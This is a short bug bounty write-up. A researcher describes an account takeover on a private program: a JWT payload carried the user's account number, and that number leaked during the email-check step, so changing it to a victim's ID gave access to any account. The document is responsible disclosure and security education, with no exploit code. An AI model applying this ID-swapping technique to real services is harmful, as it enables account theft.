Abusing JSON Web Token to steal accounts — 3000$
Hello fellow hackers! 👋
My name is Filipe Azevedo, I am a Cyber Security Researcher from Portugal. I work mainly for Intigriti and Hackerone.
Today I’m going to show you a recent finding on a private program.
So, let’s go to the vulnerability.
What’s JWT?
JWTs provide a stateless solution to authentication by removing the need to track session data on the server. Instead, JWTs allow us to safely and securely store our session data directly on the client in the form of a JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
The first part, HEADER, tell us the algorithm and token type.
The second, contains the payload itself, the information to pass.
Lastly, the verified signature, is what prevents the token from being edited.
You can know more about JWT here
Detection and exploitation of the vulnerability
I was looking for bugs such as XSS, SQL Injection, IDOR’S, but the target was pretty secure. So I start to search for bugs in the authentication flow.
I notice that the only difference between the two JWTs was the ID present on the payload. I found out that this value was the user’s account number. So, if I change my ID to the victim’s I could access any account.
How to find out the victim’s ID
There was no dedicated login and registration page. The user entered his email and clicked “Next”. The server would check the email and forward the user for login or registration.
But during this process, the ID was leaked. If the email existed, a request was sent with the email and the ID. Something like this:
email=victim@gmail.com&id=123456
Bug Reported: Apr 19, 2021
Bounty rewarded 3000$: May 31, 2021
For queries, you can DM on Twitter. Feedbacks are always welcome!
Thanks for reading.
Happy Hacking!!!